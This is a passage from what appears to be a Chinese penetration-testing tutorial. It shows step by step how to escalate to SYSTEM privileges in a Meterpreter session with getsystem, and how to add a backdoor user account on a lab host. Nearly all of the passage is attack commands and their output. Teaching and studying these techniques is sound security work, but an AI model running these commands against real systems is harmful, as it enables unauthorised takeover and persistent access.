上一節介紹了竊取目標系統令牌,現在來介紹竊取令牌后如何提升在目標系統上的權限。提升本地權限可以使用戶訪問目標系統,並且進行其他的操作,如創建用戶和組等。本節將介紹本地權限提升。
同樣的實現本地權限提升,也需要連接到Meterpreter會話,具體操作就不再介紹。本地權限提升的具體操作步驟如下所示。
(1)啟動Meterpreter會話。執行命令如下所示:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1…
meterpreter >
從輸出的信息可以看到,成功啟動了Meterpreter會話。
(2)使用getsystem命令提升本地權限。首先,查看該命令的幫助信息。執行命令如下所示:
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to '0').
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
輸出的信息顯示了getsystem命令的語法格式、作用及選項等。此時就可以根據自己的需要,使用相應的選項來提升本地權限。
(3)使用getsystem命令提升本地權限。執行命令如下所示:
meterpreter > getsystem
…got system (via technique 1).
meterpreter >
從輸出的信息可以看到,自動選擇了方法1。此時該用戶就擁有了目標系統中Test用戶的權限了,然后就可以做其他的操作,如創建文件、創建用戶和組等。如使用該用戶在目標系統上192.168.41.146創建一個名為bob的用戶。執行命令如下所示:
meterpreter > add_user bob 123456 -h 192.168.41.146
執行以上命令后,可以在主機192.168.41.146上查看到創建的bob用戶。